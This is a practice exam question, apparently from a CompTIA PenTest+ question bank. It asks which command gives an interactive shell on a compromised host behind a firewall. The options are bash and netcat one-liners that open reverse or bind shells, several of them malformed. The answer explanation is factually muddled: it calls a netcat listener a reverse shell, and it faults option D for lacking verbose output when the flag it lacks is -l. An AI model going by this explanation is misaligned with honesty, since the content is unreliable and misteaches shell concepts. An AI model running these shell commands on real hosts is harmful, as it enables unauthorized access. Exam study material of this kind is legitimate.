CompTIA PenTest+ (PT0-002) — Question 324

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

Answer options

• A. bash -i >& /dev/tcp 8443 0>&1
• B. nc -e host 8443 /bin/bash
• C. nc -vlp 8443 /bin/bash
• D. nc -vp 8443 /bin/bash

Correct answer: C

Explanation

The correct answer is C because it sets up a listener on the specified port (8443) and allows for a reverse shell connection when the target connects back to it. Option A attempts to use a TCP connection but is not interactive in the same way. Option B is incorrect because the syntax is not valid for establishing a reverse shell. Option D listens on a port but does not include the necessary flag for verbose output, which is less ideal for interaction.